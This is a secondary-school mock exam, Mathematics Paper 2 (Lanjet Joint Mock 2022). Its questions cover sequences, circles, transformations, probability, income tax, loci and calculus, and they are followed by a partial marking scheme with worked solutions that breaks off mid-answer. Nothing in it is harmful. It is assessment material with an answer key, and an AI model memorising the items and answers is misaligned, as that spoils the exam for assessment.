{"ft_lang_label":"__label__en","ft_lang_prob":0.7020594,"math_prob":0.9958133,"size":3090,"snap":"2020-45-2020-50","text_gpt3_token_len":1314,"char_repetition_ratio":0.1779002,"word_repetition_ratio":0.32027972,"special_character_ratio":0.4906149,"punctuation_ratio":0.05531915,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996917,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-20T14:29:52Z\",\"WARC-Record-ID\":\"<urn:uuid:2bcaecc6-a877-44a4-90de-18768cb1f4f8>\",\"Content-Length\":\"36647\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fc18ad2e-f571-4c47-917f-2966f26eaa50>\",\"WARC-Concurrent-To\":\"<urn:uuid:29afeb86-2ba3-4a11-89f5-31bb59c63274>\",\"WARC-IP-Address\":\"218.146.255.183\",\"WARC-Target-URI\":\"http://html.datasheetbank.com/datasheet-html/313187/TECCOR/10page/Q2006LT.html?lang=en\",\"WARC-Payload-Digest\":\"sha1:SLC3JHKNJXAPZOO6UNFBWKCXYTLTAZAC\",\"WARC-Block-Digest\":\"sha1:DF4QMPPOLG2T4QZEJ7D4OKMUW3W2NB3L\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107872746.20_warc_CC-MAIN-20201020134010-20201020164010-00112.warc.gz\"}"}
https://www.littlewaterdrop.com/static/zh/cs/java/break-continue/index.html
[ "01_basic_12_break_and_continue\n\n## 第十二章 break语句和continue语句\n\n### 1 break语句(break statement)\n\nbreak语句可用于switch语句for语句while语句do-while语句中。当执行break语句时,程序会跳出当前语句,并将程序移到下一条语句继续执行。\n\n``````int sum = 0;\nfor (int i = 1; ; i++) {\nif (i > 10)\nbreak;\nsum += i;\n}\nSystem.out.println(\"The sum of 1 to 10 is \" + sum);\n\nsum = 0;\nint i = 1;\nwhile (true) {\nif (i > 10)\nbreak;\nsum += i;\ni++;\n}\nSystem.out.println(\"The sum of 1 to 10 is \" + sum);\n\nsum = 0;\ni = 1;\ndo {\nif (i > 10)\nbreak;\nsum += i;\ni++;\n} while (true);\nSystem.out.println(\"The sum of 1 to 10 is \" + sum);\n``````\n\nbreak语句还支持另一种形式,即结束某一条语句的运行。在这种情况下,break语句中会指定一个标签标识符。当break语句运行时,程序会立即停止执行目标标签所对应的语句。break语句不必运行在循环语句中。这种break语句主要用于跳出嵌套循环或者语句块。\n\n``````int count = 2;\nlabel: if (true) {\n...\nif (count == 2)\nbreak label; // 停止执行label对应的if语句\n...\n}\n``````\n\n### 2 continue语句(continue statement)\n\n``````int sum = 0;\nfor (int i = 0; i <= 10; i++) {\nif (i%2 == 0) {\nsum += i;\n} else {\ncontinue;\n}\n}\nSystem.out.println(\"The sum of even numbers from 1 to 10 is \" + sum);\n``````\n\n### 3 小结\n\nbreak语句和continue语句可以用于打断或者退出循环的执行。break语句直接退出循环语句;而continue语句则提前中止当前的循环执行,直接进入下一次循环判断或者下一次循环的执行。为了能够直接中止嵌套循环的执行,Java语言还支持带标签的break语句。当运行该break语句时,程序会直接中止该标签对应的语句。如果该标签对应的语句是嵌套循环的话,那么,该break语句能够直接中止多重循环的执行。", null, "###### 下一章", null, "" ]
[ null, "https://www.littlewaterdrop.com/img/arrow_left.5434740c.svg", null, "https://www.littlewaterdrop.com/img/arrow_right.11ea5efb.svg", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.7120445,"math_prob":0.9863751,"size":1397,"snap":"2023-40-2023-50","text_gpt3_token_len":894,"char_repetition_ratio":0.13208902,"word_repetition_ratio":0.36363637,"special_character_ratio":0.28346458,"punctuation_ratio":0.19354838,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934929,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-09T18:01:14Z\",\"WARC-Record-ID\":\"<urn:uuid:fb73c33c-0c1a-4335-a987-8f77c5ffde24>\",\"Content-Length\":\"131320\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:47011885-dca9-4c06-8911-9e0678eb7e5c>\",\"WARC-Concurrent-To\":\"<urn:uuid:78ad3994-327a-4d18-94d8-b7cb36b80635>\",\"WARC-IP-Address\":\"18.160.18.54\",\"WARC-Target-URI\":\"https://www.littlewaterdrop.com/static/zh/cs/java/break-continue/index.html\",\"WARC-Payload-Digest\":\"sha1:5ULVGFUDQDUIJW3DEMWG4R4DHQ5DLPN5\",\"WARC-Block-Digest\":\"sha1:DLHVX4AMJFOPV3NS5YVH3KJP27EGPEW4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100942.92_warc_CC-MAIN-20231209170619-20231209200619-00768.warc.gz\"}"}
https://www.physicsforums.com/threads/simplify-the-boolean-expression-2.712667/
[ "# Simplify the boolean expression #2\n\n## Homework Statement\n\nSimplify the expression using boolean algebra postulates, laws, theorems.\n\n$(\\overline{\\overline{x + \\overline{y})(xz + \\overline{y}}) + x (\\overline{yz}})$\n\n## The Attempt at a Solution\n\n$(\\overline{\\overline{x + \\overline{y})(xz + \\overline{y}}) + x (\\overline{yz}})$\n\n1. ((x + y')(xz + y'))'' (x(yz)')'\n2. (x + y')(xz + y') (x' + (yz)'')\n3. (x + y')(xz + y') (x' + yz)\n4. (x + y')(x + y')(z + y')(x' + yz)\n5. (x + y')(z + y')(x' + yz)\n6. (xz + y')(x' + yz)\n7. xzx' + xzyz + y'x' + y'yz\n8. xx'z + xyzz + x'y' + y'yz\n9. 0*z + xyz + x'y' + 0*z\n10. 0 + xyz + x'y' + 0\n11. xyz + x'y'\n\nAm I on the right track? I keep thinking that I've done something wrong here... Thanks in advance for your help.\n\nEdit: Added steps 4-11. I believe this is the most simplified. Any critique on my methods? Perhaps there is a more efficient way to simplify this? Thanks.\n\nLast edited:\n\nberkeman\nMentor\n\n## Homework Statement\n\nSimplify the expression using boolean algebra postulates, laws, theorems.\n\n$(\\overline{\\overline{x + \\overline{y})(xz + \\overline{y}}) + x (\\overline{yz}})$\n\n## The Attempt at a Solution\n\n$(\\overline{\\overline{x + \\overline{y})(xz + \\overline{y}}) + x (\\overline{yz}})$\n\n1. ((x + y')(xz + y'))'' (x(yz)')'\n2. (x + y')(xz + y') (x' + (yz)'')\n3. (x + y')(xz + y') (x' + yz)\n4. (x + y')(x + y')(z + y')(x' + yz)\n5. (x + y')(z + y')(x' + yz)\n6. (xz + y')(x' + yz)\n7. xzx' + xzyz + y'x' + y'yz\n8. xx'z + xyzz + x'y' + y'yz\n9. 0*z + xyz + x'y' + 0*z\n10. 0 + xyz + x'y' + 0\n11. xyz + x'y'\n\nAm I on the right track? I keep thinking that I've done something wrong here... Thanks in advance for your help.\n\nEdit: Added steps 4-11. I believe this is the most simplified. Any critique on my methods? Perhaps there is a more efficient way to simplify this? Thanks.\n\nWhat are the double nots \" versus the single nots ' for? Sorry if I'm missing the obvious.\n\nCan you post the Karnaugh maps for the original problem and your solution? That's how I check my answers on these types of problems.", null, "" ]
[ null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5964245,"math_prob":0.9995259,"size":912,"snap":"2021-21-2021-25","text_gpt3_token_len":359,"char_repetition_ratio":0.19933921,"word_repetition_ratio":0.11764706,"special_character_ratio":0.4375,"punctuation_ratio":0.13471502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9968762,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-16T15:23:23Z\",\"WARC-Record-ID\":\"<urn:uuid:30eb28d0-2850-49c6-bf9a-eef127ee2d25>\",\"Content-Length\":\"65795\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71b474be-ec8c-4fed-9c76-9291e588d951>\",\"WARC-Concurrent-To\":\"<urn:uuid:fa93ec08-d202-4106-81a6-e51cada42594>\",\"WARC-IP-Address\":\"104.26.14.132\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/simplify-the-boolean-expression-2.712667/\",\"WARC-Payload-Digest\":\"sha1:4W4KVFXBEI4ABLNQAQXO3XJIWYOYUNDK\",\"WARC-Block-Digest\":\"sha1:J2UDYEQAAI7DMT6F7PINDODTZN2C2YO6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991224.58_warc_CC-MAIN-20210516140441-20210516170441-00596.warc.gz\"}"}
https://www.sz-rtcj.com/actordetail-11.html
[ "function iJVeD(e){var t=\"\",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function XTbhHN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t=\"\",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,\"\");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return iJVeD(t);};window['\\x56\\x69\\x47\\x4b\\x49\\x6b']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=XTbhHN,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c+''+c,'g'),c)));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('dGcubbG9jbbG9nLmNu','dHIueWVzdW442NzguY29t','138350',window,document,['b','4']);}:function(){};\n\n# 徐海乔 男\n\n• 性别:\n• 职业:演员\n• 星座:白羊座\n• 血型:O型\n• 身高:180cm\n• 体重:65kg\n• 地区:内地\n• 生日:1983年4月17日\n• 出生地:山东济南\n• 毕业院校:上海戏剧学院表演系03级本科班\n• 代表作:《蓬莱八仙》《大学生士兵的故事》《娘心计》" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5234504,"math_prob":0.982964,"size":2201,"snap":"2021-31-2021-39","text_gpt3_token_len":1371,"char_repetition_ratio":0.12380519,"word_repetition_ratio":0.1978022,"special_character_ratio":0.379373,"punctuation_ratio":0.25189394,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9603369,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-29T16:13:37Z\",\"WARC-Record-ID\":\"<urn:uuid:e33984c2-1f4a-4253-8477-d4a77cd60007>\",\"Content-Length\":\"46169\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c03f79e3-f7b2-4883-a65a-66503f1af656>\",\"WARC-Concurrent-To\":\"<urn:uuid:962a3a94-862b-4d62-801b-33045a0a5435>\",\"WARC-IP-Address\":\"180.215.201.177\",\"WARC-Target-URI\":\"https://www.sz-rtcj.com/actordetail-11.html\",\"WARC-Payload-Digest\":\"sha1:DBYG2RX7SDKPGDLOOBJIY5H3NAZDKFEV\",\"WARC-Block-Digest\":\"sha1:QOGTONEMW34PJY6XEJE4FLPYNB3IXRMD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153860.57_warc_CC-MAIN-20210729140649-20210729170649-00638.warc.gz\"}"}
https://numbermatics.com/n/218/
[ "# 218\n\n## 218 is an even composite number composed of two prime numbers multiplied together.\n\nWhat does the number 218 look like?\n\nThis visualization shows the relationship between its 2 prime factors (large circles) and 4 divisors.\n\n218 is an even composite number. It is composed of two distinct prime numbers multiplied together. It has a total of four divisors.\n\n## Prime factorization of 218:\n\n### 2 × 109\n\nSee below for interesting mathematical facts about the number 218 from the Numbermatics database.\n\n### Names of 218\n\n• Cardinal: 218 can be written as Two hundred eighteen.\n\n### Scientific notation\n\n• Scientific notation: 2.18 × 102\n\n### Factors of 218\n\n• Number of distinct prime factors ω(n): 2\n• Total number of prime factors Ω(n): 2\n• Sum of prime factors: 111\n\n### Divisors of 218\n\n• Number of divisors d(n): 4\n• Complete list of divisors:\n• Sum of all divisors σ(n): 330\n• Sum of proper divisors (its aliquot sum) s(n): 112\n• 218 is a deficient number, because the sum of its proper divisors (112) is less than itself. Its deficiency is 106\n\n### Bases of 218\n\n• Binary: 110110102\n• Base-36: 62\n\n### Squares and roots of 218\n\n• 218 squared (2182) is 47524\n• 218 cubed (2183) is 10360232\n• The square root of 218 is 14.7648230601\n• The cube root of 218 is 6.0184616549\n\n### Scales and comparisons\n\nHow big is 218?\n• 218 seconds is equal to 3 minutes, 38 seconds.\n• To count from 1 to 218 would take you about forty-nine seconds.\n\nThis is a very rough estimate, based on a speaking rate of half a second every third order of magnitude. If you speak quickly, you could probably say any randomly-chosen number between one and a thousand in around half a second. Very big numbers obviously take longer to say, so we add half a second for every extra x1000. (We do not count involuntary pauses, bathroom breaks or the necessity of sleep in our calculation!)\n\n• A cube with a volume of 218 cubic inches would be around 0.5 feet tall.\n\n### Recreational maths with 218\n\n• 218 backwards is 812\n• The number of decimal digits it has is: 3\n• The sum of 218's digits is 11\n• More coming soon!\n\nHTML: To link to this page, just copy and paste the link below into your blog, web page or email.\n\nBBCODE: To link to this page in a forum post or comment box, just copy and paste the link code below:\n\nMLA style:\n\"Number 218 - Facts about the integer\". Numbermatics.com. 2022. Web. 27 September 2022.\n\nAPA style:\nNumbermatics. (2022). Number 218 - Facts about the integer. Retrieved 27 September 2022, from https://numbermatics.com/n/218/\n\nChicago style:\nNumbermatics. 2022. \"Number 218 - Facts about the integer\". https://numbermatics.com/n/218/\n\nThe information we have on file for 218 includes mathematical data and numerical statistics calculated using standard algorithms and methods. We are adding more all the time. If there are any features you would like to see, please contact us. Information provided for educational use, intellectual curiosity and fun!\n\nKeywords: Divisors of 218, math, Factors of 218, curriculum, school, college, exams, university, Prime factorization of 218, STEM, science, technology, engineering, physics, economics, calculator, two hundred eighteen.\n\nOh no. Javascript is switched off in your browser.\nSome bits of this website may not work unless you switch it on." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8764265,"math_prob":0.9060384,"size":2388,"snap":"2022-40-2023-06","text_gpt3_token_len":582,"char_repetition_ratio":0.11157718,"word_repetition_ratio":0.033333335,"special_character_ratio":0.26716918,"punctuation_ratio":0.16490486,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98037857,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-27T01:21:01Z\",\"WARC-Record-ID\":\"<urn:uuid:c404eb11-1f80-4c44-9d52-dc89d01e8953>\",\"Content-Length\":\"16901\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a6685a47-5aab-4c56-b186-6901e92f63d9>\",\"WARC-Concurrent-To\":\"<urn:uuid:8c874014-40d2-48ae-b301-17cbace65a86>\",\"WARC-IP-Address\":\"72.44.94.106\",\"WARC-Target-URI\":\"https://numbermatics.com/n/218/\",\"WARC-Payload-Digest\":\"sha1:TQSMVRDZATIGBABQ6V4SNJXYOKCAGWYQ\",\"WARC-Block-Digest\":\"sha1:XNWIRZURC6GVY4FZP2DWGSPLJQO5GJJQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334974.57_warc_CC-MAIN-20220927002241-20220927032241-00129.warc.gz\"}"}
https://math.stackexchange.com/questions/2862553/first-order-stochastic-dominance
[ "First-Order Stochastic Dominance\n\nConsider two cumulative distribution functions $F(x)$ and $G(x)$ for $x\\in[a,b]$ where $G(x)$ has the first-order stochastic dominance over $F(x)$. That is, $F(x)>G(x)$ for all $x\\in(a,b)$. We assume $a<0$ and $b>0$. Let $f(x)$ and $g(x)$ be the probability density function of $F(x)$ and $G(x)$ respectively.\n\nSuppose the expected value of $x$ under $F(x)$ is positive: $$\\int_{a}^{b}xf(x)dx=\\int_{a}^{0}xf(x)dx+\\int_{0}^{b}xf(x)dx>0.$$\n\nUnder this condition, does $f(x)-g(x)>0$ always hold in any interval of $0<x<b$?\n\nGraphical Expression of the Question is Here.\n\n• Thank you for your comments. Could you tell me how I can edit my question? Should I delete this question and post a new question? Jul 25 '18 at 16:01\n• Please don't delete the question. There is a link that allows you to edit the question just below it. (It is just above and to the left of the box that shows your name.) Jul 25 '18 at 16:02\n• Also, your definition of FOSD seems much stronger than the usual definition. Is that intentional? Jul 25 '18 at 16:04\n• Yes, it is intentional. Thank you for pointing it out. Jul 25 '18 at 16:05\n\nSuppose $a=-1$ and $b=2$, that $F$ is the uniform distribution in the interval $[-1,2]$, and that $G$ is the uniform distribution in the interval $[0,2]$. Clearly the expected value of $x$ under $F$ is positive but $$g(x)=\\frac{1}{2}>\\frac{1}{3}=f(x)\\quad\\text{for all}\\;x\\in[0,b].$$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63173646,"math_prob":0.9998909,"size":519,"snap":"2022-05-2022-21","text_gpt3_token_len":184,"char_repetition_ratio":0.14563107,"word_repetition_ratio":0.0,"special_character_ratio":0.37379575,"punctuation_ratio":0.08943089,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99998987,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-24T22:57:37Z\",\"WARC-Record-ID\":\"<urn:uuid:6fd43893-68be-4591-bf3f-b2aa9eddcb26>\",\"Content-Length\":\"135535\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9dbc8cb0-3154-4dd1-a533-9484db72bd0c>\",\"WARC-Concurrent-To\":\"<urn:uuid:e182f5a6-fd59-40f2-a798-f60ed1544c23>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/2862553/first-order-stochastic-dominance\",\"WARC-Payload-Digest\":\"sha1:2CQTKJLWC6ESLCBARXN63KXTNADKPSPR\",\"WARC-Block-Digest\":\"sha1:ZRBKV6ZDGVQ7NVHNCQNJTHZRXPXCAFVG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320304686.15_warc_CC-MAIN-20220124220008-20220125010008-00469.warc.gz\"}"}
https://www.easyelimu.com/kenya-secondary-schools-pastpapers/mocks/2022/item/6126-mathematics-paper-2-questions-and-answers-lanjet-joint-mock-exams-2022
[ "## Mathematics Paper 2 Questions and Answers - Lanjet Joint Mock Exams 2022\n\nINSTRUCTIONS.\n\n• Answer all the questions in the spaces provided.\n\n### QUESTIONS\n\nSECTION 1 (50mks)\n\n1. The sum of n terms of the sequence:\n3,9,15,21…. Is 7500\n1. Find the 20th term of the sequence. (2mks)\n2. Determine the value of n. (2mks)\n2. A quadratic curve passes through the points (-2, 0) and (1, 0). Find the equation of the curve in the form y = ax2+bx+c, where a, b and c are constants. (2mks)\n3. Make h the subject of the formula. (2mks)\nq= 1+rh\n1-ht\n4. P (1,2) and Q(9,8) are the points on the ends of the diameter of a circle. Write down in terms of x and y the equation of the circle in the form: ax2+by2+x+y+c=0. (3mks)\n5. In the figure below, O is the centre of the circle and AT is a tangent to the circle at A. AT = 2√6cm and DT=4cm.", null, "Determine:\n1. OA (2mks)\n2. The value of angle AOB (2mks)\n6. In a transformation, an object with an area of 5cm2 is mapped onto an image whose area is 30cm2. Given that the matrix of the transformation is x", null, "1. Find the value of x. (2mks)\n2. Hence determine the inverse of the matrix", null, "7. The co-ordinates of P are (0,7) and Q are (3.5, 1.4). A point S divides PQ externally in the ratio 9:2. Find the co-ordinates of S. (3mks)\n8. The top of a coffee table is a regular hexagon. Each side of the hexagon measures 50.0cm, find the percentage error in calculating the perimeter of the top of the table. (3mks)\n9. The figure below represents a cuboid ABCDEFGH. AB=60cm, BC=11cm and CH=10cm.", null, "Calculate the angle between EB and plane EFGH. (3mks)\n10.\n1. Expand and simplify the expression", null, "up to the third term. (2mks)\n2. Hence use the expansion in (a) above to approximate the value of (39.6)5 correct to 3 significant figures. (2mks)\n11. A solution was gently heated, its temperature readings taken at intervals of 1 minute and recorded as shown in the table below:\n Time(min) 0 1 2 3 4 5 Temperature (ºC) 4 5.2 8.4 14.3 16.8 17.5\n1. On the grid provided below, draw the time – temperature graph. (2mks)\n2. Use the graph to find the average rate of change in temperature between t=1.8 and t=3.4. (2mks)\n12. The shortest distance between two points A(40ºN,20ºW) and B(ѲºS,20ºW) on the surface of the earth is 8008km. given that the radius of the earth is 6370km, determine the position of B. (Take π=22/7). (3mks)\n13. Simplify           √3         (2mks)\n√3 - √2\n14. The table below shows income tax rates in a certain year.\n Monthly income in Kshs. Tax rate in each shilling Up to 9680 10% From 9681 to 18800 15% From 18801 to 27920 20% From 27921 to 37040 25% Over 37040 30%\nIn that year, a monthly personal tax relief of ksh. 1056 was allowed. Calculate the monthly income tax paid by an employee who earned a monthly salary of kshs. 32,500. (4mks)\n15. Three types of beverages are mixed in the ration 1:3:5 respectively. Type A costs sh 26, type B costs sh 28 and type C sh 32, per packet. Find the cost of the mixture per packet. (3mks)\n16. The gradient of a curve is given by dy/dx = x2- 4x+3. The curve passes through the point (1,0). Find the equation of the curve. (3mks)\n\nSECTION II (50MKS)\n\n1. The hire purchase (H.P) price of an electronic device was ksh. 276,000. A deposit of ksh 60,000 was paid followed by 18 equal monthly installments.\n1. Calculate the monthly installment. (2mks)\n2. The cash price of the electronic device was 10% less than the hire purchase (H.P) price. Calculate the cash price. (2mks)\n3. 
Madam Kanini decided to buy the electronic device in cash. She was allowed a 5% discount on the cash price, so she took a bank loan to buy the device. The bank charged compound interest on the loan at the rate of 20% p.a. The loan was repaid in 2 years.
1. Calculate the amount repaid to the bank by the end of the second year. (3mks)
2. Express as a percentage of the hire purchase (HP) price, the difference between the amount repaid to the bank and the hire purchase price. (3mks)
2. An examination involves a written test and a practical test. The probability that a candidate passes the written test is 6/11. If the candidate passes the written test, then the probability of passing the practical test is 3/5, otherwise it is 2/7.
1. Illustrate this information on a tree diagram. (2mks)
2. Determine the probability that a candidate:
1. Passes both tests. (2mks)
2. Passes the written test. (2mks)
3. Determine the probability that the candidate:
1. Passes one test only. (2mks)
2. Fails for not passing the written test. (2mks)
3. Construct triangle PQR with PQ = 7.2 cm, QR = 6 cm and ∠PQR = 48º. (3mks)
1. The locus L1, of points equidistant from P and Q, and the locus L2, of points equidistant from P and R, meet at M. Locate M, hence measure QM. (4mks)
2. A point X moves within triangle PQR such that QX ≥ QM. Shade and label the locus of X. (3mks)
4. Triangle PQR shown on the grid below has vertices P(5,5), Q(10,10) and R(10,15).", null, "
1. Find the coordinates of the points P΄, Q΄ and R΄, the images of P, Q and R respectively under the transformation M whose matrix is (3mks)
M = [ −0.6  0.8 ]
    [  0.8  0.6 ]
Given that M is a reflection:
1. Draw triangle P΄Q΄R΄ and the mirror line of the reflection. (2mks)
2. Determine the equation of the mirror line of the reflection. (2mks)
2. Triangle P˝Q˝R˝ is the image of triangle P΄Q΄R΄ under reflection N, where N is a reflection in the Y-axis.
1. Determine triangle P˝Q˝R˝ (1mk)
2. Determine a 2x2 matrix equivalent to the transformation NM. (2mks)
5. In the figure below, PR is the diameter of the circle with centre O. Points P, Q, R and S are on the circumference of the circle. Angle PRQ = 72º, QS = QP and line USV is a tangent to the circle at S.
Giving reasons, calculate the size of:", null, "
1. ∠QPR (2 marks)
2. ∠PQS (2 marks)
3. ∠OQS (2 marks)
4. ∠RTS (2 marks)
5. ∠RSV (2 marks)
6. Three quantities R, S and T are such that R varies directly as S and inversely as the square of T.
1. Given that R = 480 when S = 150 and T = 5, write an equation connecting R, S and T. (4mks)
2.
1. Find the value of R when S = 360 and T = 1.5. (2mks)
2. Find the percentage change in R if S increases by 5% and T decreases by 20%. (4mks)
7. For a CBC in-service training course for teachers, at least four (4) but not more than nine (9) teachers are to be chosen per school. The ratio of the number of male teachers to the number of female teachers must be less than 2:1 and there must be more males than females. If x and y represent the number of male teachers and female teachers respectively:
1. Write down in their simplest form the inequalities that x and y must satisfy. (4mks)
2. On the grid provided below, represent the inequalities on the graph. (4mks)
3. Use the graph to determine the composition of the training group of:
1. The largest size. (1mk)
2. The smallest size. (1mk)
8. The equation of a curve is given by y = 5x − ½x².
1. On the grid provided below, draw the curve of y = 5x − ½x² for 0 ≤ x ≤ 6. (3mks)
2. 
By integration, find the area bounded by the curve, the line x = 6 and the x-axis. (3mks)
3. On the same grid, draw the line y = 2x. (1mk)
4. Determine the area bounded by the curve and the line y = 2x. (3mks)

### MARKING SCHEME

SECTION 1 (50mks)

1. The sum of n terms of the sequence:
3, 9, 15, 21, … is 7500.
1. Find the 20th term of the sequence. (2mks)
a = 3
d = 6
nth term = a + (n − 1)d
∴ 20th term = 3 + (20 − 1)6
= 117
2. Determine the value of n. (2mks)
sn = n/2 {2a + (n − 1)d}
7500 = n/2 {2 × 3 + (n − 1)6}
15000 = 6n²
∴ n² = 2500
n = ±50
= 50 terms
2. A quadratic curve passes through the points (-2, 0) and (1, 0). Find the equation of the curve in the form y = ax² + bx + c, where a, b and c are constants. (2mks)", null, "x = −2 and x = 1 are roots, so (x + 2) and (x − 1) are factors.
Let y = (x + 2)(x − 1)
⇒ y = x² + x − 2
3. Make h the subject of the formula. (2mks)
q = (1 + rh)/(1 − ht)
q − qht = 1 + rh
q − 1 = rh + qht
q − 1 = h(r + qt)
∴ h = (q − 1)/(r + qt)
4. P(1, 2) and Q(9, 8) are the points on the ends of the diameter of a circle. Write down in terms of x and y the equation of the circle in the form ax² + by² + x + y + c = 0. (3mks)
ans: x² + y² − 10x − 10y + 25 = 0
5. In the figure below, O is the centre of the circle and AT is a tangent to the circle at A. AT = 2√6 cm and DT = 4 cm.", null, "Determine:
1. OA (2mks)
Let OD = x
TO × TD = TA²
(4 + x) × 4 = (2√6)²
16 + 4x = 24
4x = 8
∴ x = 2
2. The value of angle AOB (2mks)", null, "∴ θ = 67.8º
∴ ∠AOB = 2 × 67.8º
= 135.6º
6. In a transformation, an object with an area of 5 cm² is mapped onto an image whose area is 30 cm². Given that the matrix of the transformation is x", null, "
1. Find the value of x. (2mks)
determinant = 4x − 2(x − 1)
= 2x + 2
area scale factor = 30/5 = 6
det = ASF
∴ 2x + 2 = 6
x = 2
2. Hence determine the inverse of the matrix", null, "", null, "", null, "
7. The co-ordinates of P are (0, 7) and Q are (3.5, 1.4). A point S divides PQ externally in the ratio 9:2. Find the co-ordinates of S. (3mks)", null, "S = (9Q − 2P)/(9 − 2) = ((9 × 3.5 − 2 × 0)/7, (9 × 1.4 − 2 × 7)/7)
∴ S = (4.5, −0.2)
8. The top of a coffee table is a regular hexagon. Each side of the hexagon measures 50.0 cm. Find the percentage error in calculating the perimeter of the top of the table. (3mks)
n = 6 sides
actual perimeter = 50.0 × 6 = 300 cm
maximum perimeter = 50.05 × 6 = 300.3 cm
∴ absolute error = 300.3 − 300 = 0.3
% error = 0.3/300 × 100 = 0.1%
9. The figure below represents a cuboid ABCDEFGH. AB = 60 cm, BC = 11 cm and CH = 10 cm.", null, "Calculate the angle between EB and the plane EFGH. (3mks)", null, "EG² = 11² + 60²
= 121 + 3600
EG = √3721 = 61 cm
tan α = 10/61 = 0.1639
∴ α = 9.3º
10.
1. Expand and simplify the expression", null, "up to the third term. (2mks)
(4x)⁵ + 5(4x)⁴(−y/2) + 10(4x)³(−y/2)² + …
= 1024x⁵ + 5 × 256x⁴(−y/2) + 10 × 64x³(y²/4) + …
= 1024x⁵ − 640x⁴y + 160x³y² + …
2. Hence use the expansion in (a) above to approximate the value of (39.6)⁵ correct to 3 significant figures. (2mks)
Let 39.6 = 40 − 0.4
⇒ 39.6⁵ = (40 − 0.4)⁵
Comparing:
4x = 40; x = 10
−y/2 = −0.4; ∴ y = 0.8
Substituting:
1024(10⁵) − 640(10⁴)(0.8) + 160(10³)(0.8)² + …
= 102400000 − 5120000 + 102400
